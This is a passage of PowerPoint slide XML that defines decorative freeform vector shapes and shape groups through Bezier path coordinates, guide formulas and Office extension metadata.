                    <a:pt x="78" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="193"/>
                    <a:pt x="68" y="188"/>
                    <a:pt x="68" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="177"/>
                    <a:pt x="73" y="173"/>
                    <a:pt x="78" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="173"/>
                    <a:pt x="88" y="177"/>
                    <a:pt x="88" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="188"/>
                    <a:pt x="84" y="193"/>
                    <a:pt x="78" y="193"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="148" y="164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8" y="12"/>
                    <a:pt x="148" y="12"/>
                    <a:pt x="148" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14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114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FB5FB4-4C53-45C6-9580-927D92875E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669559">
              <a:off x="2266840" y="3095065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124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC2F568E-F97A-42AD-B75B-58321A7B19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36245">
              <a:off x="6966888" y="4093733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4" name="Freeform 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223B8C23-653D-422D-B58D-6EAE8E9CF2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463989">
              <a:off x="10195748" y="1653787"/>
              <a:ext cx="511175" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 80 w 136"/>
                <a:gd name="T1" fmla="*/ 38 h 200"/>
                <a:gd name="T2" fmla="*/ 80 w 136"/>
                <a:gd name="T3" fmla="*/ 57 h 200"/>
                <a:gd name="T4" fmla="*/ 69 w 136"/>
                <a:gd name="T5" fmla="*/ 69 h 200"/>
                <a:gd name="T6" fmla="*/ 56 w 136"/>
                <a:gd name="T7" fmla="*/ 57 h 200"/>
                <a:gd name="T8" fmla="*/ 56 w 136"/>
                <a:gd name="T9" fmla="*/ 38 h 200"/>
                <a:gd name="T10" fmla="*/ 69 w 136"/>
                <a:gd name="T11" fmla="*/ 25 h 200"/>
                <a:gd name="T12" fmla="*/ 80 w 136"/>
                <a:gd name="T13" fmla="*/ 38 h 200"/>
                <a:gd name="T14" fmla="*/ 94 w 136"/>
                <a:gd name="T15" fmla="*/ 200 h 200"/>
                <a:gd name="T16" fmla="*/ 44 w 136"/>
                <a:gd name="T17" fmla="*/ 200 h 200"/>
                <a:gd name="T18" fmla="*/ 0 w 136"/>
                <a:gd name="T19" fmla="*/ 157 h 200"/>
                <a:gd name="T20" fmla="*/ 0 w 136"/>
                <a:gd name="T21" fmla="*/ 44 h 200"/>
                <a:gd name="T22" fmla="*/ 44 w 136"/>
                <a:gd name="T23" fmla="*/ 0 h 200"/>
                <a:gd name="T24" fmla="*/ 60 w 136"/>
                <a:gd name="T25" fmla="*/ 0 h 200"/>
                <a:gd name="T26" fmla="*/ 60 w 136"/>
                <a:gd name="T27" fmla="*/ 20 h 200"/>
                <a:gd name="T28" fmla="*/ 48 w 136"/>
                <a:gd name="T29" fmla="*/ 38 h 200"/>
                <a:gd name="T30" fmla="*/ 48 w 136"/>
                <a:gd name="T31" fmla="*/ 57 h 200"/>
                <a:gd name="T32" fmla="*/ 60 w 136"/>
                <a:gd name="T33" fmla="*/ 74 h 200"/>
                <a:gd name="T34" fmla="*/ 60 w 136"/>
                <a:gd name="T35" fmla="*/ 88 h 200"/>
                <a:gd name="T36" fmla="*/ 76 w 136"/>
                <a:gd name="T37" fmla="*/ 88 h 200"/>
                <a:gd name="T38" fmla="*/ 76 w 136"/>
                <a:gd name="T39" fmla="*/ 74 h 200"/>
                <a:gd name="T40" fmla="*/ 88 w 136"/>
                <a:gd name="T41" fmla="*/ 57 h 200"/>
                <a:gd name="T42" fmla="*/ 88 w 136"/>
                <a:gd name="T43" fmla="*/ 38 h 200"/>
                <a:gd name="T44" fmla="*/ 76 w 136"/>
                <a:gd name="T45" fmla="*/ 20 h 200"/>
                <a:gd name="T46" fmla="*/ 76 w 136"/>
                <a:gd name="T47" fmla="*/ 0 h 200"/>
                <a:gd name="T48" fmla="*/ 94 w 136"/>
                <a:gd name="T49" fmla="*/ 0 h 200"/>
                <a:gd name="T50" fmla="*/ 136 w 136"/>
                <a:gd name="T51" fmla="*/ 44 h 200"/>
                <a:gd name="T52" fmla="*/ 136 w 136"/>
                <a:gd name="T53" fmla="*/ 157 h 200"/>
                <a:gd name="T54" fmla="*/ 94 w 136"/>
                <a:gd name="T55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6" h="200">
                  <a:moveTo>
                    <a:pt x="80" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="57"/>
                    <a:pt x="80" y="57"/>
                    <a:pt x="80" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="64"/>
                    <a:pt x="76" y="69"/>
                    <a:pt x="69" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="69"/>
                    <a:pt x="56" y="64"/>
                    <a:pt x="56" y="57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1"/>
                    <a:pt x="62" y="25"/>
                    <a:pt x="69" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="25"/>
                    <a:pt x="80" y="31"/>
                    <a:pt x="80" y="38"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="94" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="200"/>
                    <a:pt x="44" y="200"/>
                    <a:pt x="44" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="200"/>
                    <a:pt x="0" y="181"/>
                    <a:pt x="0" y="15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3" y="23"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="48" y="38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65"/>
                    <a:pt x="53" y="72"/>
                    <a:pt x="60" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="88"/>
                    <a:pt x="60" y="88"/>
                    <a:pt x="60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83" y="72"/>
                    <a:pt x="88" y="65"/>
                    <a:pt x="88" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="38"/>
                    <a:pt x="88" y="38"/>
                    <a:pt x="88" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="30"/>
                    <a:pt x="83" y="23"/>
                    <a:pt x="76" y="2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18" y="0"/>
                    <a:pt x="136" y="20"/>
                    <a:pt x="136" y="44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81"/>
                    <a:pt x="118" y="200"/>
                    <a:pt x="94" y="2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5" name="Freeform 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6212C353-B5D0-4331-89F2-BA5BAB7178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968536">
              <a:off x="11364899" y="904585"/>
              <a:ext cx="754483" cy="708323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ECF07199-C6D9-4E93-9E2D-02B36C3F1876}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="6110587">
              <a:off x="3914384" y="11279"/>
              <a:ext cx="544512" cy="749300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 93 w 145"/>
                <a:gd name="T1" fmla="*/ 114 h 199"/>
                <a:gd name="T2" fmla="*/ 145 w 145"/>
                <a:gd name="T3" fmla="*/ 106 h 199"/>
                <a:gd name="T4" fmla="*/ 0 w 145"/>
                <a:gd name="T5" fmla="*/ 0 h 199"/>
                <a:gd name="T6" fmla="*/ 43 w 145"/>
                <a:gd name="T7" fmla="*/ 175 h 199"/>
                <a:gd name="T8" fmla="*/ 46 w 145"/>
                <a:gd name="T9" fmla="*/ 169 h 199"/>
                <a:gd name="T10" fmla="*/ 70 w 145"/>
                <a:gd name="T11" fmla="*/ 129 h 199"/>
                <a:gd name="T12" fmla="*/ 113 w 145"/>
                <a:gd name="T13" fmla="*/ 192 h 199"/>
                <a:gd name="T14" fmla="*/ 128 w 145"/>
                <a:gd name="T15" fmla="*/ 197 h 199"/>
                <a:gd name="T16" fmla="*/ 133 w 145"/>
                <a:gd name="T17" fmla="*/ 195 h 199"/>
                <a:gd name="T18" fmla="*/ 138 w 145"/>
                <a:gd name="T19" fmla="*/ 180 h 199"/>
                <a:gd name="T20" fmla="*/ 136 w 145"/>
                <a:gd name="T21" fmla="*/ 176 h 199"/>
                <a:gd name="T22" fmla="*/ 93 w 145"/>
                <a:gd name="T23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199">
                  <a:moveTo>
                    <a:pt x="93" y="114"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="106"/>
                    <a:pt x="145" y="106"/>
                    <a:pt x="145" y="1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175"/>
                    <a:pt x="43" y="175"/>
                    <a:pt x="43" y="175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70" y="129"/>
                    <a:pt x="70" y="129"/>
                    <a:pt x="70" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="192"/>
                    <a:pt x="113" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="197"/>
                    <a:pt x="123" y="199"/>
                    <a:pt x="128" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="197"/>
                    <a:pt x="131" y="196"/>
                    <a:pt x="133" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="192"/>
                    <a:pt x="139" y="186"/>
                    <a:pt x="138" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="179"/>
                    <a:pt x="137" y="177"/>
                    <a:pt x="136" y="176"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="93" y="1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917743D2-91FF-45EE-888D-289D9DE20D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859567">
              <a:off x="10311362" y="547581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78" name="Freeform 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5DFCAD3-04D8-47E9-AA94-479510D947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080229">
              <a:off x="1723533" y="2626350"/>
              <a:ext cx="593375" cy="567235"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 348 w 454"/>
                <a:gd name="T1" fmla="*/ 280 h 434"/>
                <a:gd name="T2" fmla="*/ 369 w 454"/>
                <a:gd name="T3" fmla="*/ 434 h 434"/>
                <a:gd name="T4" fmla="*/ 227 w 454"/>
                <a:gd name="T5" fmla="*/ 367 h 434"/>
                <a:gd name="T6" fmla="*/ 85 w 454"/>
                <a:gd name="T7" fmla="*/ 434 h 434"/>
                <a:gd name="T8" fmla="*/ 106 w 454"/>
                <a:gd name="T9" fmla="*/ 280 h 434"/>
                <a:gd name="T10" fmla="*/ 0 w 454"/>
                <a:gd name="T11" fmla="*/ 166 h 434"/>
                <a:gd name="T12" fmla="*/ 151 w 454"/>
                <a:gd name="T13" fmla="*/ 135 h 434"/>
                <a:gd name="T14" fmla="*/ 227 w 454"/>
                <a:gd name="T15" fmla="*/ 0 h 434"/>
                <a:gd name="T16" fmla="*/ 303 w 454"/>
                <a:gd name="T17" fmla="*/ 135 h 434"/>
                <a:gd name="T18" fmla="*/ 454 w 454"/>
                <a:gd name="T19" fmla="*/ 166 h 434"/>
                <a:gd name="T20" fmla="*/ 348 w 454"/>
                <a:gd name="T21" fmla="*/ 280 h 434"/>
                <a:gd name="T22" fmla="*/ 272 w 454"/>
                <a:gd name="T23" fmla="*/ 168 h 434"/>
                <a:gd name="T24" fmla="*/ 227 w 454"/>
                <a:gd name="T25" fmla="*/ 88 h 434"/>
                <a:gd name="T26" fmla="*/ 182 w 454"/>
                <a:gd name="T27" fmla="*/ 168 h 434"/>
                <a:gd name="T28" fmla="*/ 92 w 454"/>
                <a:gd name="T29" fmla="*/ 187 h 434"/>
                <a:gd name="T30" fmla="*/ 154 w 454"/>
                <a:gd name="T31" fmla="*/ 253 h 434"/>
                <a:gd name="T32" fmla="*/ 144 w 454"/>
                <a:gd name="T33" fmla="*/ 346 h 434"/>
                <a:gd name="T34" fmla="*/ 227 w 454"/>
                <a:gd name="T35" fmla="*/ 306 h 434"/>
                <a:gd name="T36" fmla="*/ 310 w 454"/>
                <a:gd name="T37" fmla="*/ 346 h 434"/>
                <a:gd name="T38" fmla="*/ 298 w 454"/>
                <a:gd name="T39" fmla="*/ 253 h 434"/>
                <a:gd name="T40" fmla="*/ 362 w 454"/>
                <a:gd name="T41" fmla="*/ 187 h 434"/>
                <a:gd name="T42" fmla="*/ 272 w 454"/>
                <a:gd name="T43" fmla="*/ 168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54" h="434">
                  <a:moveTo>
                    <a:pt x="348" y="280"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="369" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348" y="280"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="272" y="168"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="227" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272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79" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2456AFDF-E809-4FD5-80D2-AFBE6ADD362B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0193509">
              <a:off x="11298631" y="3800225"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/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8E4E1890-0FCC-4DDB-BDAE-6883FDBFE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7" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA306C83-62A5-4AB3-8D31-0E279C92A79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0" name="Group 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B6AE5E4-8E8E-4F74-BC69-BF14AEA65D9A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112827">
              <a:off x="5409433" y="3249254"/>
              <a:ext cx="542757" cy="1014720"/>
              <a:chOff x="2490" y="1429"/>
              <a:chExt cx="782" cy="1462"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="174" name="Freeform 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3A0027-7D7C-4DFB-A393-4DAD2C8AE2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5" name="Freeform 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2AE32E-0FF5-4536-A9FF-24EB3E2D11C3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B3808723-E6C5-4607-9275-ACDF6BA416A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="3686359">
              <a:off x="1675391" y="1798715"/>
              <a:ext cx="430997" cy="1230792"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="171" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3DDF988-66F9-424E-802B-E3DEB2B60E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2" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BBD199E-9FD6-40FE-9A8A-35B3296EF1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3" name="任意多边形 169">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFC56BB-2DF6-4C46-87D0-6413E3F927A3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C2CE3EBB-704F-4679-8372-454D594AC602}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="14625855">
              <a:off x="9103382" y="5494084"/>
              <a:ext cx="428290" cy="1223063"/>
              <a:chOff x="9469654" y="2159644"/>
              <a:chExt cx="752475" cy="2148831"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="168" name="Freeform 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8D2838-B951-4390-B45E-73FADEE6066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9" name="Freeform 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E6E38E-830B-4E32-A4C5-3B90E550B5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0" name="任意多边形 166">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65ED8068-AF4B-43B1-8314-E9648CB08322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Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92F303A-2872-444D-A988-4D5C60674CD6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19202932">
              <a:off x="8590908" y="-129566"/>
              <a:ext cx="1185863" cy="1506538"/>
              <a:chOff x="2503" y="1682"/>
              <a:chExt cx="747" cy="949"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="165" name="Oval 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D096A998-6AB0-442A-B1E9-44BEDCD02482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594" y="2474"/>
                <a:ext cx="140" cy="14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6" name="Freeform 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105D9F5D-68D5-4426-A1F9-2A5B573DB1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58" y="2262"/>
                <a:ext cx="379" cy="369"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 46 w 159"/>
                  <a:gd name="T1" fmla="*/ 152 h 155"/>
                  <a:gd name="T2" fmla="*/ 2 w 159"/>
                  <a:gd name="T3" fmla="*/ 107 h 155"/>
                  <a:gd name="T4" fmla="*/ 8 w 159"/>
                  <a:gd name="T5" fmla="*/ 30 h 155"/>
                  <a:gd name="T6" fmla="*/ 30 w 159"/>
                  <a:gd name="T7" fmla="*/ 30 h 155"/>
                  <a:gd name="T8" fmla="*/ 34 w 159"/>
                  <a:gd name="T9" fmla="*/ 89 h 155"/>
                  <a:gd name="T10" fmla="*/ 91 w 159"/>
                  <a:gd name="T11" fmla="*/ 89 h 155"/>
                  <a:gd name="T12" fmla="*/ 83 w 159"/>
                  <a:gd name="T13" fmla="*/ 61 h 155"/>
                  <a:gd name="T14" fmla="*/ 97 w 159"/>
                  <a:gd name="T15" fmla="*/ 26 h 155"/>
                  <a:gd name="T16" fmla="*/ 147 w 159"/>
                  <a:gd name="T17" fmla="*/ 0 h 155"/>
                  <a:gd name="T18" fmla="*/ 159 w 159"/>
                  <a:gd name="T19" fmla="*/ 18 h 155"/>
                  <a:gd name="T20" fmla="*/ 124 w 159"/>
                  <a:gd name="T21" fmla="*/ 53 h 155"/>
                  <a:gd name="T22" fmla="*/ 137 w 159"/>
                  <a:gd name="T23" fmla="*/ 79 h 155"/>
                  <a:gd name="T24" fmla="*/ 141 w 159"/>
                  <a:gd name="T25" fmla="*/ 122 h 155"/>
                  <a:gd name="T26" fmla="*/ 46 w 159"/>
                  <a:gd name="T27" fmla="*/ 15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9" h="155">
                    <a:moveTo>
                      <a:pt x="46" y="152"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="151"/>
                      <a:pt x="0" y="145"/>
                      <a:pt x="2" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="72"/>
                      <a:pt x="8" y="30"/>
                      <a:pt x="8" y="30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3" y="61"/>
                      <a:pt x="83" y="61"/>
                      <a:pt x="83" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="61"/>
                      <a:pt x="74" y="39"/>
                      <a:pt x="97" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="13"/>
                      <a:pt x="147" y="0"/>
                      <a:pt x="147" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="18"/>
                      <a:pt x="159" y="18"/>
                      <a:pt x="159" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="53"/>
                      <a:pt x="124" y="53"/>
                      <a:pt x="124" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="53"/>
                      <a:pt x="131" y="65"/>
                      <a:pt x="137" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="91"/>
                      <a:pt x="147" y="104"/>
                      <a:pt x="141" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="155"/>
                      <a:pt x="76" y="153"/>
                      <a:pt x="46" y="1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7" name="Freeform 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC6003AF-A5BA-40B4-B7D3-69A3CB301B3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503" y="1682"/>
                <a:ext cx="747" cy="578"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 288 w 313"/>
                  <a:gd name="T1" fmla="*/ 109 h 243"/>
                  <a:gd name="T2" fmla="*/ 264 w 313"/>
                  <a:gd name="T3" fmla="*/ 120 h 243"/>
                  <a:gd name="T4" fmla="*/ 287 w 313"/>
                  <a:gd name="T5" fmla="*/ 47 h 243"/>
                  <a:gd name="T6" fmla="*/ 292 w 313"/>
                  <a:gd name="T7" fmla="*/ 34 h 243"/>
                  <a:gd name="T8" fmla="*/ 5 w 313"/>
                  <a:gd name="T9" fmla="*/ 34 h 243"/>
                  <a:gd name="T10" fmla="*/ 11 w 313"/>
                  <a:gd name="T11" fmla="*/ 46 h 243"/>
                  <a:gd name="T12" fmla="*/ 32 w 313"/>
                  <a:gd name="T13" fmla="*/ 64 h 243"/>
                  <a:gd name="T14" fmla="*/ 12 w 313"/>
                  <a:gd name="T15" fmla="*/ 78 h 243"/>
                  <a:gd name="T16" fmla="*/ 20 w 313"/>
                  <a:gd name="T17" fmla="*/ 164 h 243"/>
                  <a:gd name="T18" fmla="*/ 39 w 313"/>
                  <a:gd name="T19" fmla="*/ 195 h 243"/>
                  <a:gd name="T20" fmla="*/ 46 w 313"/>
                  <a:gd name="T21" fmla="*/ 165 h 243"/>
                  <a:gd name="T22" fmla="*/ 52 w 313"/>
                  <a:gd name="T23" fmla="*/ 195 h 243"/>
                  <a:gd name="T24" fmla="*/ 71 w 313"/>
                  <a:gd name="T25" fmla="*/ 151 h 243"/>
                  <a:gd name="T26" fmla="*/ 43 w 313"/>
                  <a:gd name="T27" fmla="*/ 78 h 243"/>
                  <a:gd name="T28" fmla="*/ 42 w 313"/>
                  <a:gd name="T29" fmla="*/ 67 h 243"/>
                  <a:gd name="T30" fmla="*/ 38 w 313"/>
                  <a:gd name="T31" fmla="*/ 37 h 243"/>
                  <a:gd name="T32" fmla="*/ 154 w 313"/>
                  <a:gd name="T33" fmla="*/ 19 h 243"/>
                  <a:gd name="T34" fmla="*/ 153 w 313"/>
                  <a:gd name="T35" fmla="*/ 170 h 243"/>
                  <a:gd name="T36" fmla="*/ 112 w 313"/>
                  <a:gd name="T37" fmla="*/ 238 h 243"/>
                  <a:gd name="T38" fmla="*/ 116 w 313"/>
                  <a:gd name="T39" fmla="*/ 217 h 243"/>
                  <a:gd name="T40" fmla="*/ 128 w 313"/>
                  <a:gd name="T41" fmla="*/ 216 h 243"/>
                  <a:gd name="T42" fmla="*/ 155 w 313"/>
                  <a:gd name="T43" fmla="*/ 243 h 243"/>
                  <a:gd name="T44" fmla="*/ 172 w 313"/>
                  <a:gd name="T45" fmla="*/ 243 h 243"/>
                  <a:gd name="T46" fmla="*/ 198 w 313"/>
                  <a:gd name="T47" fmla="*/ 216 h 243"/>
                  <a:gd name="T48" fmla="*/ 159 w 313"/>
                  <a:gd name="T49" fmla="*/ 170 h 243"/>
                  <a:gd name="T50" fmla="*/ 259 w 313"/>
                  <a:gd name="T51" fmla="*/ 36 h 243"/>
                  <a:gd name="T52" fmla="*/ 236 w 313"/>
                  <a:gd name="T53" fmla="*/ 120 h 243"/>
                  <a:gd name="T54" fmla="*/ 214 w 313"/>
                  <a:gd name="T55" fmla="*/ 174 h 243"/>
                  <a:gd name="T56" fmla="*/ 241 w 313"/>
                  <a:gd name="T57" fmla="*/ 164 h 243"/>
                  <a:gd name="T58" fmla="*/ 263 w 313"/>
                  <a:gd name="T59" fmla="*/ 159 h 243"/>
                  <a:gd name="T60" fmla="*/ 297 w 313"/>
                  <a:gd name="T61" fmla="*/ 174 h 243"/>
                  <a:gd name="T62" fmla="*/ 313 w 313"/>
                  <a:gd name="T63" fmla="*/ 129 h 243"/>
                  <a:gd name="T64" fmla="*/ 32 w 313"/>
                  <a:gd name="T65" fmla="*/ 70 h 243"/>
                  <a:gd name="T66" fmla="*/ 35 w 313"/>
                  <a:gd name="T67" fmla="*/ 73 h 243"/>
                  <a:gd name="T68" fmla="*/ 32 w 313"/>
                  <a:gd name="T69" fmla="*/ 75 h 243"/>
                  <a:gd name="T70" fmla="*/ 124 w 313"/>
                  <a:gd name="T71" fmla="*/ 194 h 243"/>
                  <a:gd name="T72" fmla="*/ 124 w 313"/>
                  <a:gd name="T73" fmla="*/ 190 h 243"/>
                  <a:gd name="T74" fmla="*/ 124 w 313"/>
                  <a:gd name="T75" fmla="*/ 194 h 243"/>
                  <a:gd name="T76" fmla="*/ 279 w 313"/>
                  <a:gd name="T77" fmla="*/ 126 h 243"/>
                  <a:gd name="T78" fmla="*/ 284 w 313"/>
                  <a:gd name="T79" fmla="*/ 126 h 243"/>
                  <a:gd name="T80" fmla="*/ 296 w 313"/>
                  <a:gd name="T81" fmla="*/ 129 h 243"/>
                  <a:gd name="T82" fmla="*/ 296 w 313"/>
                  <a:gd name="T83" fmla="*/ 124 h 243"/>
                  <a:gd name="T84" fmla="*/ 296 w 313"/>
                  <a:gd name="T85" fmla="*/ 129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13" h="243">
                    <a:moveTo>
